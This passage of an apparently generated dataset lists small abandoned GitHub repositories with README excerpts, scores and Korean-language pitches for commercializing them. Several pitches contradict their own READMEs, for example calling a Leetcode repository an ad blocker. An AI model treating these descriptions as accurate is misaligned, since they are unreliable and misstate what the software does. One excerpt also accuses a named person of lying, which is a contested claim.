necessary)\n\n3) Clone repository\n\n```bash\ngit clone https://github.com/paulzi/ipcamera-telegram-bot.git\ncd ipcamera-telegram-bot\n```\n\n4) Install dependencies via composer:\n\n```bash\ncomposer update\n```\n\n5) Change config in /config/config.php (hookUrl and apiKey is required)\n\n6) Register hook:\n\n```bash\nphp set.php\n```\n\n7) Send `/watch` to bot in chat\n\n8) add `* * * * * php watch.php` in CRON for auto-recovery daemon\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"MeshCon/2014.meshcon.net","github_url":"https://github.com/MeshCon/2014.meshcon.net","stars":11,"language":"HTML","license":"unknown","abandonment_months":62,"description":"# MeshCon/2014.meshcon.net 분석\n\n## 왜 보물인가\n2014년 메시 네트워킹 컨퍼런스의 웹사이트 소스코드로, 분산 네트워크 기술의 초기 구현 방식과 커뮤니티 운영 노하우가 담겨있는 역사적 기술 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **P2P 네트워킹 SaaS**: 블록체인이나 분산 파일 공유 플랫폼의 기술 기반 구축\n2. **네","readme_excerpt":"","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"yacy/YaCymin","github_url":"https://github.com/yacy/YaCymin","stars":11,"language":"PHP","license":"unknown","abandonment_months":195,"description":"# YaCymin 저장소 분석\n\n## 왜 보물인가\n2010년부터 개발된 오픈소스 검색 기술로, 인터넷 검색 엔진의 핵심 원리를 담고 있어 검색 관련 스타트업의 기초 기술로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 내부 검색 SaaS**: 회사 내부 문서·이메일·파일들을 빠르게 찾아주는 검색 서비스\n2. **맞춤형 검색 API 판매**","readme_excerpt":"* YaCymin - YaCy Admin and Search \n* for PHP5 with cURL\n*\n* Copyright (c) 2010 yacy.net / dulcedo\n* URL: http://github.com/dulcedo/YaCymin\n\n* Permission is hereby granted, free of charge, to any person\n* obtaining a copy of this software and associated documentation\n* files (the \"Software\"), to deal in the Software without\n* restriction, including without limitation the rights to use,\n* copy, modify, merge, publish, distribute, sublicense, and/or sell\n* copies of the Software, and to permit persons to whom the\n* Software is furnished to do so, subject to the following\n* conditions:\n\n* The above copyright notice and this permission notice shall be\n* included in all copies or substantial portions of the Software.\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/wp-dev-buddy","github_url":"https://github.com/fossasia/wp-dev-buddy","stars":11,"language":"PHP","license":"unknown","abandonment_months":120,"description":"# wp-dev-buddy 상용화 분석\n\n## 왜 보물인가\nWordPress 웹사이트를 만드는 개발자들의 반복적인 작업을 자동화해주는 도구로, 개발 시간을 단축하고 실수를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: WordPress 개발자들을 위한 월 구독형 자동화 도구 플랫폼\n2. **내부 업무 도구**: WordPres","readme_excerpt":"=== DevBuddy Twitter Feed ===\r\n\r\nContributors: EjiOsigwe\r\nDonate link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=XMXJEVPQ35YMJ\r\nTags: Twitter, Twitter Feed, Twitter 1.1, Twitter API, Twitter Shortcode, Twitter tweet, tweets, Twitter, Twitter connect, Twitter share, Twitter share button, DevBuddy\r\nRequires at least: 3.1.0\r\nTested up to: 4.2.1\r\nStable tag: 4.0.0\r\nLicense: GPLv2 or later\r\nLicense URI: http://www.gnu.org/licenses/gpl-2.0.html\r\n\r\nA Twitter (v1.1) feed plugin for the developers that's fully customisable and support timelines, searches and lists.\r\n\r\n== Description ==\r\n\r\n**NOTE: This plugin requires your server to have cURL enabled to work.**\r\n\r\n**Features**:\r\n\r\n* Supports User timelines, Search timelines and Lists\r\n* Use either a template tag or a shortcode to render feeds\r\n* Developers can utilise the plugin system to fully customise the plugin's functionality\r\n* A default stylesheet is included that you can use either for display or for study when","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"madanvikram/sentiment_analysis_mxnet_gluon","github_url":"https://github.com/madanvikram/sentiment_analysis_mxnet_gluon","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":99,"description":"# 감정 분석 AI 기술 평가 보고서\n\n## 왜 보물인가\n텍스트에서 긍정/부정 감정을 자동으로 판별하는 AI 기술로, 고객 피드백 분석부터 브랜드 평판 관리까지 다양한 비즈니스에 즉시 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: SNS 모니터링 플랫폼 - 트위터, 인스타그램의 고객 반응을 실시간으로 분석해 브랜드 평판 추적\n2","readme_excerpt":"# Sentiment Analysis with Apache MXNet and Gluon\nThis tutorial walks you through how to implement a sentiment analysis model to classify movie reviews as either 'Positive' or 'Negative' using Apache MXNet and the Gluon programming interface.\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"serverless/open-runtime-poc","github_url":"https://github.com/serverless/open-runtime-poc","stars":7,"language":"Go","license":"unknown","abandonment_months":90,"description":"# serverless/open-runtime-poc 분석\n\n## 왜 보물인가\n서버 없이 코드를 실행하는 기술의 기초 연구로, 클라우드 컴퓨팅의 미래 방향을 제시하는 실험적 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용량만큼만 비용을 내는 저비용 웹 애플리케이션 플랫폼\n2. **내부 업무 도구**: 자동화된 데이터 처리 및 ","readme_excerpt":"# The Serverless Open Runtime for AWS Lambda\n\nThis uses AWS's Runtime API for Lambda to implement a universal runtime.\n\nWhen done it will feature (exact list TBD):\n * [CloudEvent](https://cloudevents.io/) based function signature\n * [Middlewares](#middlewares)\n * [Language Agnostic](#language-agnostic)\n * Graceful timeout handling - [poc branch](https://github.com/serverless/open-runtime-poc/tree/timeout-test)\n * more!\n\n## Try it out\n\n\n```shell\nnpm i -g serverless # make sure you have serverless framework verison 1.34.0 or greater\nmake\nsls deploy\ncd example\nsls deploy\nsls invoke -f hello\n```\n\n## NodeJS debugging!\nThe open runtime implementation Node JS supports remote debugging. To use it:\n1. ensure you have a high timeout on your lambda (or else it'll be killed while debugging)\n2. on a publicly accessible server, install `socat` and run:\n   ```\n   socat -v TCP-LISTEN:9999,reuseaddr,fork TCP-LISTEN:4444,reuseaddr\n   ```\n3. invoke your lambda with the `_debugProxy` key in the event set ","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"Kreijstal/JavaStuff","github_url":"https://github.com/Kreijstal/JavaStuff","stars":11,"language":"Java","license":"unknown","abandonment_months":123,"description":"# Kreijstal/JavaStuff 상업화 분석\n\n## 왜 보물인가\nJava 프로그래밍 학습과 실무에 필요한 코드 모음으로, 개발자들이 반복적으로 작성하는 기초 작업을 빠르게 처리할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 교육 플랫폼**: 초급 개발자를 위한 학습 자료 및 실습 문제 구성\n2. **개발자 업무 도구**: 회사","readme_excerpt":"JavaStuff\n=========\n\nSome Java work\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/lubuntu-artwork","github_url":"https://github.com/fossasia/lubuntu-artwork","stars":11,"language":"","license":"NOASSERTION","abandonment_months":102,"description":"# Lubuntu 아트워크 프로젝트 분석\n\n## 왜 보물인가\n가볍고 빠른 운영체제인 루분투를 더 예쁘고 사용하기 좋게 만드는 디자인 자산 모음으로, 오픈소스 운영체제의 외관을 개선하는 핵심 요소입니다.\n\n## 어디에 쓸 수 있나\n1. **운영체제 커스터마이징 서비스**: 루분투 사용자가 자신의 컴퓨터를 더 예쁘게 꾸미도록 도와주는 유료 테마 팩 판매\n2. ","readme_excerpt":"# lubuntu-artwork\nlubuntu-artwork\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/lxde-artwork","github_url":"https://github.com/fossasia/lxde-artwork","stars":12,"language":"","license":"unknown","abandonment_months":120,"description":"# LXDE 아트워크 저장소 분석\n\n## 왜 보물인가\n가볍고 빠른 Linux 데스크톱 환경을 위한 공식 디자인 자산 모음으로, 오픈소스 프로젝트의 시각적 정체성을 체계적으로 관리하는 원본 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **Linux 배포판 커스터마이징 서비스**: 기업이 자신의 브랜드로 LXDE를 재설계하는 SaaS 플랫폼\n2. **오픈소스 ","readme_excerpt":"# lxde-artwork\nLXDE Artwork\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"loklak/loklak_heroku_ant_buildpack","github_url":"https://github.com/loklak/loklak_heroku_ant_buildpack","stars":12,"language":"Shell","license":"unknown","abandonment_months":114,"description":"# loklak_heroku_ant_buildpack 분석\n\n## 왜 보물인가\n클라우드 플랫폼(Heroku)에서 대규모 데이터 수집 시스템을 자동으로 배포할 수 있는 설정 템플릿으로, 복잡한 기술 구축을 단순화합니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 모니터링 SaaS**: 트위터·인스타그램 등 여러 플랫폼의 글/이미지를 자동 수집해 분석하는","readme_excerpt":"Heroku buildpack for Loklak: Java (with Apache Ant)\n===================================================\n\nThis is a [Heroku buildpack](http://devcenter.heroku.com/articles/buildpack) made specifically for the [Loklak server](https://github.com/loklak/loklak_server). Forked from https://github.com/dennisg/heroku-buildpack-ant (Thanks!)\nIt uses Apache Ant 1.9.7 to build your application and OpenJDK 1.8 (currently) to run it.\n\nUsage\n-----\nThis buildpack is meant to be used in conjuction with Loklak server only. If you want to run any other application with Ant on Heroku, check out https://github.com/dennisg/heroku-buildpack-ant\n\nIn your project directory:\n\n1. Clone the Loklak server (if not already) : `git clone https://github.com/loklak/loklak_server.git`\n2. Create a heroku app: `heroku create`\n3. Set the buildpack: `heroku buildpacks:set https://github.com/loklak/heroku_buildpack_ant_loklak.git`\n4. Push your app to heroku: `git push heroku master`\n5. Confirm the loklak server is running:","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"susiai/susi_specs","github_url":"https://github.com/susiai/susi_specs","stars":11,"language":"","license":"unknown","abandonment_months":29,"description":"# susiai/susi_specs 평가 분석\n\n## 왜 보물인가\n인공지능 기반 대화형 시스템(챗봇)을 만들기 위한 설계 명세서를 공개 공유하고 있어, AI 기술 개발자들이 표준화된 방식으로 협력할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **챗봇 SaaS 서비스**: 기업용 고객 상담 챗봇 플랫폼으로 월 구독료를 받으며 판매\n2. **","readme_excerpt":"# SUSI Device\n\nThis project contains the sources to install SUSI elements on a Raspberry Pi.\nFor now we try to combine the following elements:\n\n- a microphone and a speaker\n- a small display\n- a local LLM (large language model)\n- a docker environment to host docker containers\n\nWe try to provide SUSI application parts as docker images. This should help to deploy the SUSI ecosystem also on non-Raspberry Pi devices to enhance the ability for developers to join in even if they don't have a SUSI device. However, it is the target to run everything in place using only open source elements and without any internet connection offline.\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"ajxs/cxos","github_url":"https://github.com/ajxs/cxos","stars":5,"language":"Ada","license":"unknown","abandonment_months":66,"description":"# ajxs/cxos 상업화 분석\n\n## 왜 보물인가\n오픈소스 운영체제 프로젝트로, 컴퓨터 기초 기술을 소유하고 커스터마이징할 수 있는 독립적인 IT 자산입니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 대규모 기업의 임베디드 시스템(공장 자동화, ATM, 의료기기)에 맞춤형 운영체제 탑재\n- **SaaS 서비스**: 경량 클라우드 컴퓨팅 환","readme_excerpt":"# CXOS\n\n## Background\nCXOS is a personal research project operating-system implemented in Ada. The current aims of the project are to learn the fundamentals of operating system development and research the benefits provided by the Ada programming language for engineering safety-critical bare-metal software.\n\nThe operating system currently exclusively targets the x86 platform. An ARM/MIPS implementation is being considered for the long-term.\n\n## Current status\nCXOS currently contains only an extremely minimal implementation, offering no interactivity. Currently CXOS has a working higher-half kernel, physical memory manager and several peripheral drivers. Currently development is focused on reaching a working tasking implementation and userland.\n\n## Project goals\nThe long-term goals of the project as of time-of-writing are to implement a minimal non-graphical user-interface and basic user applications. After this has been achieved, planning will begin on a more robust and planned impleme","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/perspektive89.com","github_url":"https://github.com/fossasia/perspektive89.com","stars":11,"language":"","license":"unknown","abandonment_months":82,"description":"# perspektive89.com 저장소 분석\n\n## 왜 보물인가\n다양한 관점에서 정보를 비교·분석할 수 있는 웹 기반 플랫폼으로, 사용자들이 복잡한 주제를 균형잡힌 시각으로 이해하도록 돕습니다.\n\n## 어디에 쓸 수 있나\n- **뉴스 분석 SaaS**: 정치·사회 이슈별 상반된 의견을 자동으로 정리해주는 구독형 서비스\n- **교육 기관 내부 도구**: ","readme_excerpt":"# perspektive89.com\nOpen Source Journal Perspektive89.com\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"yacy/YacY-Munin-plugin","github_url":"https://github.com/yacy/YacY-Munin-plugin","stars":11,"language":"","license":"unknown","abandonment_months":188,"description":"# YacY-Munin-plugin 평가 보고서\n\n## 왜 보물인가\n서버 상태를 자동으로 모니터링하고 시각화하는 도구로, 기업의 온라인 서비스 안정성을 24시간 감시할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 모니터링 플랫폼으로 운영하여 기업 고객에게 월간 구독 제공\n2. **내부 업무 도구**: 중소 데이터센터","readme_excerpt":"YaCy Monitoring Plugin for Munin\n\nRequirements\n\n* XML::Smart ;\n* LWP ;\n* YacY\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"Kreijstal/Random-C-stuff","github_url":"https://github.com/Kreijstal/Random-C-stuff","stars":11,"language":"C","license":"unknown","abandonment_months":145,"description":"# Kreijstal/Random-C-stuff 평가\n\n## 왜 보물인가\n10년 이상 방치된 미완성 프로젝트로, 재정적 가치나 실용성이 제한적입니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 소규모 팀의 프로토타입 개발 시 레퍼런스 코드로 활용\n- **교육용 자료**: 프로그래밍 초보자를 위한 C언어 학습 예제 모음으로 운영\n- **오픈소스 ","readme_excerpt":"Random-C-stuff\n==============\n\nFor all Random C stuff\nsort.c is for now a random attempt to duplicate man sort\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"Dinakhaled/MovieApp","github_url":"https://github.com/Dinakhaled/MovieApp","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":52,"description":"# MovieApp 저장소 분석\n\n## 왜 보물인가\n영화 정보를 쉽게 검색하고 관리할 수 있는 앱으로, 영화 산업 종사자부터 일반 사용자까지 다양한 고객층을 확보할 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **영화 추천 SaaS 서비스**: 넷플릭스 같은 스트리밍 플랫폼을 위한 개인화된 영화 추천 엔진으로 활용\n2. **영화관 매표 시스","readme_excerpt":"This project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app).\n\n## Available Scripts\n\nIn the project directory, you can run:\n\n### `npm start`\n\nRuns the app in the development mode.<br>\nOpen [http://localhost:3000](http://localhost:3000) to view it in the browser.\n\nThe page will reload if you make edits.<br>\nYou will also see any lint errors in the console.\n\n### `npm test`\n\nLaunches the test runner in the interactive watch mode.<br>\nSee the section about [running tests](https://facebook.github.io/create-react-app/docs/running-tests) for more information.\n\n### `npm run build`\n\nBuilds the app for production to the `build` folder.<br>\nIt correctly bundles React in production mode and optimizes the build for the best performance.\n\nThe build is minified and the filenames include the hashes.<br>\nYour app is ready to be deployed!\n\nSee the section about [deployment](https://facebook.github.io/create-react-app/docs/deployment) for more information.\n\n### `npm","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/sciencetech.asia","github_url":"https://github.com/fossasia/sciencetech.asia","stars":12,"language":"HTML","license":"unknown","abandonment_months":93,"description":"# sciencetech.asia 저장소 분석\n\n## 왜 보물인가\n과학과 기술 정보를 아시아 지역에 쉽게 접근할 수 있도록 모아놓은 디지털 자산으로, 교육과 정보 공유의 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 아시아 과학 뉴스와 기술 트렌드를 정기적으로 큐레이션하여 구독자에게 배포하는 뉴스레터 플랫폼\n2. **내부 업무 ","readme_excerpt":"# sciencetech.asia\nWebsite for ScienceTech.Asia\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"younglaker/blocker","github_url":"https://github.com/younglaker/blocker","stars":14,"language":"Python","license":"unknown","abandonment_months":87,"description":"# Blocker 저장소 분석\n\n## 왜 보물인가\n원치 않는 광고나 콘텐츠를 자동으로 차단해주는 기술로, 사용자 경험을 개선하려는 많은 서비스에서 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **브라우저 확장 프로그램 서비스**: 광고 차단 기능이 있는 유료 브라우저 확장 프로그램으로 판매\n2. **스트리밍 플랫폼**: 넷플릭스나 유튜브 같은 서비스에 ","readme_excerpt":"# Leetcode\nPython 3 for Leetcode\n\n# Explanation\n\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"yacy/yacybot","github_url":"https://github.com/yacy/yacybot","stars":12,"language":"Python","license":"unknown","abandonment_months":175,"description":"# YaCy Bot 상용화 분석\n\n## 왜 보물인가\n인터넷 검색 엔진을 직접 만들고 운영할 수 있는 오픈소스 기술로, 구글 같은 대형 검색 플랫폼에 의존하지 않고 자체 검색 시스템을 구축하려는 기업들에게 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 검색 SaaS**: 회사 내부 문서, 이메일, 파일을 검색하는 업무 도구로 판매\n2. **","readme_excerpt":"The YaCy IRC Bot\n================\n\nThis is a little IRC bot written in Python which can search a YaCy peer and\noutput the results to a IRC channel.\n\nAdditional requirements\n-----------------------\n\nThe script depends on two libraries that are not included in python and have to\nbe installed separately:\n\n- The Python IRC library (http://python-irclib.sourceforge.net/). You need at\n  least irclib.py and ircbot.py. Only version 0.4.8 was tested.\n\n- html2text (http://www.aaronsw.com/2002/html2text/). Commit ID\n  c368b1491c2829b5c48c384c3316edcab43778b6 was tested.\n\nConfiguration\n-------------\n\nAll configuration variables for the bot are in config.py. Just edit them as you\nlike.\n\nLicense\n-------\n\n\"THE PIZZA-WARE LICENSE\" (derived from \"THE BEER-WARE LICENCE\"):\n<cfr34k-yacy@tkolb.de> wrote this file. As long as you retain this notice you\ncan do whatever you want with this stuff. If we meet some day, and you think\nthis stuff is worth it, you can buy me a pizza in return. - Thomas Kolb\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"go-qamel/json-to-go","github_url":"https://github.com/go-qamel/json-to-go","stars":10,"language":"QML","license":"unknown","abandonment_months":79,"description":"","readme_excerpt":"JSON to Go\n---\n\nThe port of a [web app](https://mholt.github.io/json-to-go/) that created by [@mholt](https://github.com/mholt) with same name, intended as demo for [`qamel`](https://github.com/go-qamel/qamel). Using this app, you can  instantly converts JSON into a Go type definition. You can download the pre-compiled binary in [release](https://github.com/go-qamel/json-to-go/releases) page.\n\n![Screenshot](https://raw.githubusercontent.com/go-qamel/json-to-go/master/screenshot.png)\n\n### How to Build\n\nBefore building this app, make sure `qamel` has been [installed](https://github.com/go-qamel/qamel/wiki/Installation) on your system. If it's already installed, do following steps :\n\n- Clone or download this repository to your local directory\n- Open the directory from terminal\n- Build the app: `qamel build`\n\n### Licenses\n\nJSON-to-Go is distributed under [MIT license](https://choosealicense.com/licenses/mit/), which means you can use and modify it however you want. However, if you make an ","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"jcupitt/libvips","github_url":"https://github.com/jcupitt/libvips","stars":6,"language":"C","license":"lgpl-2.1","abandonment_months":57,"description":"# libvips 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지를 빠르고 효율적으로 처리할 수 있는 강력한 도구로, 대량의 이미지를 다루는 서비스들의 핵심 기술이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 사진 편집 플랫폼에서 필터 적용, 크기 조정, 포맷 변환 기능 제공\n- **내부 업무 도구**: 전자상거래 회사의","readme_excerpt":"# libvips : an image processing library\n\n[![CI](https://github.com/libvips/libvips/workflows/CI/badge.svg)](https://github.com/libvips/libvips/actions)\n[![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/libvips.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?sort=-opened&can=2&q=proj:libvips)\n[![Coverity Status](https://scan.coverity.com/projects/6503/badge.svg)](https://scan.coverity.com/projects/jcupitt-libvips)\n[![Gitter](https://badges.gitter.im/libvips/devchat.svg)](https://gitter.im/libvips/devchat?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\n# Introduction\n\nlibvips is a [demand-driven, horizontally\nthreaded](https://github.com/libvips/libvips/wiki/Why-is-libvips-quick)\nimage processing library. Compared to similar\nlibraries, [libvips runs quickly and uses little\nmemory](https://github.com/libvips/libvips/wiki/Speed-and-memory-use).\nlibvips is licensed under the [LGPL\n2.1+](https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html).\n","composite_score":0.3003,"license_safety_tag":"restricted"},{"name":"able8/Available-Short-Github-Username","github_url":"https://github.com/able8/Available-Short-Github-Username","stars":7,"language":"","license":"unknown","abandonment_months":91,"description":"# Available-Short-Github-Username 분석\n\n## 왜 보물인가\nGitHub에서 사용 가능한 짧은 사용자명을 자동으로 찾아주는 도구로, 온라인 신원 구축을 원하는 사람들에게 경쟁력 있는 계정명을 획득하는 데 도움을 줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: GitHub 프로필 최적화 플랫폼 - 사용자가 원하는 사","readme_excerpt":"# Available-Short-Github-Username\n\n分享几千个3位长度的 Github 用户名，大家可以挑选中意的名字注册！\n\n### 起因:\n\n- 为了找到简短可用的 Github 用户名\n\n### 原理：\n\n- 一般情况下\n- 如果用户名存在，则访问 `https://github.com/Userame` 返回 200\n- 如果返回是 `404 Not Found` ，则这个用户名 **很可能** 没被注册\n\n### 实现\n\n- `curl -sI \"https://github.com/$Name\" | grep  -q \"404 Not Found\" && echo $Name >> ok.txt`\n- `-I`,  表示仅获取网页头部，大大减少数据量。Fetch the headers only!\n\n### 注意\n- txt文件里是1.1w个用户名，但大概测试发现只有一半左右是可以使用的！\n\n### 脚本摘要\n\n```bash\nfor i in 1 2 3 4 5 6 7 8 9 0 a b c d e f g h i j k l m n o p q r s t u v w x y z\ndo\n    for j in 1 2 3 4 5 6 7 8 9 0 a b c d e f g h i j k l m n o p q r s t u v w x y z\n    do\n        for m in 1 2 3 4 5 6 7 8 9 0 a b c d e f g h i j k l m n o p q r s t u v w x y z\n        do\n            echo $i$j$m >> aaa.txt\n        done\n    done\ndone\n\n\n\n# 并发设置\nCommand=\"curl -s\" # 待检测的进程的 关键字\nMaxBingFaNum=100\nSleepTime=3  # 检测进程数量的时间间隔\nDownloadCount=\"1\"\nfor Name in $(cat aaa.txt)\ndo\n    DownloadCount=$((++DownloadCount))\n    {\n        curl -sI \"https://github.com/$Name\" | gr","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"Kreijstal/PonyPictures","github_url":"https://github.com/Kreijstal/PonyPictures","stars":11,"language":"Shell","license":"unknown","abandonment_months":144,"description":"# PonyPictures 상업화 분석\n\n## 왜 보물인가\n만화나 애니메이션 캐릭터 이미지를 자동으로 분류하고 관리할 수 있는 도구로, 팬 커뮤니티나 콘텐츠 제작자들이 이미지 정리에 소비하는 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 애니메이션 팬 커뮤니티 플랫폼(SaaS)**\n- 사용자들이 업로드한 캐릭터 이미지를 자동으로 태그","readme_excerpt":"Hello, so you're here, as you can see this zip doesn't have that many images, isn't that right.\nWell, because this doesn't have ANY images, it merely has references to those images.\nThese images are unnamed, I've been thinking in a way to give them names, Though. It's really hard actually.\n\nI'd like an online directory where I could update pictures and stuff, anyway, here I go.\n\nThis is actually a scrap, this is the first version, in next ones, we will probably use other hosts -_-, give some names, remove some duplicates, etc.\nThis is not an easy job, you can help organize this mess too! You should! \nAnd we can make our pony pic directory together.\n\nAnyway, if you're wondering how to do this, well..\n\nfirst of all, you should get wget on your %path% enviromental variable, to do this, you kinda have to go to system properties, advanced settings, enviromental variables, append a ; add this pathname to there and done.\nMyComputer->Properties->Advanced->Env Variables->Path\nhttp://stackoverfl","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"Kreijstal/BatchProjects","github_url":"https://github.com/Kreijstal/BatchProjects","stars":10,"language":"Batchfile","license":"unknown","abandonment_months":123,"description":"# BatchProjects 저장소 분석\n\n## 왜 보물인가\n여러 개의 작업을 한 번에 자동으로 처리할 수 있는 도구로, 반복적인 업무에 소비되는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 고객이 월정액을 내고 자신의 대량 데이터 처리를 웹사이트에서 직접 실행하는 서비스\n- **내부 업무 도구**: 마케팅팀","readme_excerpt":"BatchProjects\n=============\n\nAll projects batch\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"petertodd/emin-gun-sirer-lying-about-things","github_url":"https://github.com/petertodd/emin-gun-sirer-lying-about-things","stars":9,"language":"HTML","license":"unknown","abandonment_months":102,"description":"# petertodd/emin-gun-sirer-lying-about-things 평가\n\n## 왜 보물인가\n암호화폐 업계의 주요 인물들 간 논쟁과 주장의 검증 기록을 체계적으로 보존한 자료로, 기술 검증과 신뢰도 평가에 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 뉴스 플랫폼**: 블록체인 업계 인물들의 과거 발언 검증 기능 추가\n2. **투자","readme_excerpt":"# Emin Gün Sirer Lying About Things\n\nWork in progress; pull-req's welcome! Best to keep this to the strictest\npossible definition, e.g. clear lies (including lying by omission), not simply\nill-advised opinions.  So him claiming Bitcoin will crash due to selfish mining\nis an opinion. Don't forget to archive any relevant websites with the [Internet\nArchive Wayback Machine](https://web.archive.org) and [archive.is](https://archive.is).\n\nHopefully this will result in retractions and/or rebuttals and this repo will\nstay empty, but we'll see...\n\n\n# Claiming that Adam Back Pushed Bitcoin Gold\n\n![](twitter.com/el33th4xor/status/935928919391440896/screenshot.png)\n\nhttps://twitter.com/el33th4xor/status/935928919391440896\n\nStatus: No evidence provided that Adam did in fact do this.\n\n# Unsubtantiated Sock Puppet Claims\n\nhttps://twitter.com/el33th4xor/status/941909627008094208\n\nStatus: Zero evidence provided that any of the people he blocked are sock puppets, or are hired by any company.\n\n\n# Teecha","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"nartc/rn-movies","github_url":"https://github.com/nartc/rn-movies","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":42,"description":"# nartc/rn-movies 사업화 분석\n\n## 왜 보물인가\n스마트폰에서 영화 정보를 빠르게 찾고 관리할 수 있는 앱의 핵심 기술을 갖춘 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **영화 추천 SaaS**: 사용자 관심사에 맞춰 영화를 추천하고 저장하는 웹/앱 서비스로 월 구독료 수익화\n2. **영화관 내부 도구**: 극장 직원이 상영작 정보를","readme_excerpt":"# React Native Movies App - powered by TMDB Api\n\nThis is an application as a mean to practice React Native using TMDB Api. This is written fully in TypeScript. And this is still a WIP. Only two screens have been done\n\n## Technologies\n1. React / ReactNative\n2. TypeScript\n3. React Navigation\n4. React Native Elements\n5. Redux / Redux Observable with Typesafe Actions\n6. Axios / Date-fns\n...along with some other libraries...\n\n## Installation and run\n\nAs any other RN application on Github, what you need to do:\n1. Well, get setup for React Native\n2. Clone this repo\n3. Install the dependencies with `yarn` or `npm`\n4. Run `react-native run-ios` or `react-native run-android`\n\n## Todos\n\n- [x] Linking `trailer` to `Youtube`\n- [x] Implement TMDb's Authentication\n- [x] Login as Member\n- [x] Rate media\n- [x] Profile Screen\n- [x] Add/Remove to/from Watchlist\n- [x] Add/Remove to/from Favorites\n\n## Next version\n- [ ] Galleries `Lightbox` in `MediaDetail`\n- [ ] Master Search component for both `Movie` an","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"OnebugIS/nodejs-","github_url":"https://github.com/OnebugIS/nodejs-","stars":8,"language":"HTML","license":"unknown","abandonment_months":104,"description":"# OnebugIS/nodejs- 프로젝트 분석\n\n## 왜 보물인가\nNode.js를 기반으로 만든 이 프로젝트는 웹 서버나 웹 애플리케이션을 빠르게 구축할 수 있는 기초 틀을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 스타트업이 빠르게 클라우드 기반 소프트웨어를 런칭할 때 필요한 기본 뼈대 제공\n- **내부 업무 도구**: ","readme_excerpt":"# nodejs-\n基于nodejs,Robomong数据库开发的博客后台管理系统\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"MeshCon/Meshcon-Artwork","github_url":"https://github.com/MeshCon/Meshcon-Artwork","stars":11,"language":"","license":"unknown","abandonment_months":120,"description":"# MeshCon/Meshcon-Artwork 평가\n\n## 왜 보물인가\n3D 네트워크 구조를 시각적으로 표현하는 디자인 자산으로, 복잡한 기술 개념을 누구나 쉽게 이해할 수 있게 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인프라 관리 SaaS**: 데이터센터 연결 상태를 실시간으로 시각화하는 대시보드에 활용\n2. **기업 네트워크 진단","readme_excerpt":"# Meshcon-Artwork\nMeshcon Artwork\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"baromjon/ramupthemoon","github_url":"https://github.com/baromjon/ramupthemoon","stars":7,"language":"","license":"unknown","abandonment_months":51,"description":"# ramupthemoon 저장소 분석\n\n## 왜 보물인가\n프로젝트 설명과 문서가 부족하여 실제 기능과 가치를 판단하기 어려운 상태입니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 서비스**: 저장소명과 커밋 내역만으로는 구체적인 서비스 형태를 특정하기 어렵습니다.\n**2. 내부 업무 도구**: 비공개 저장소로 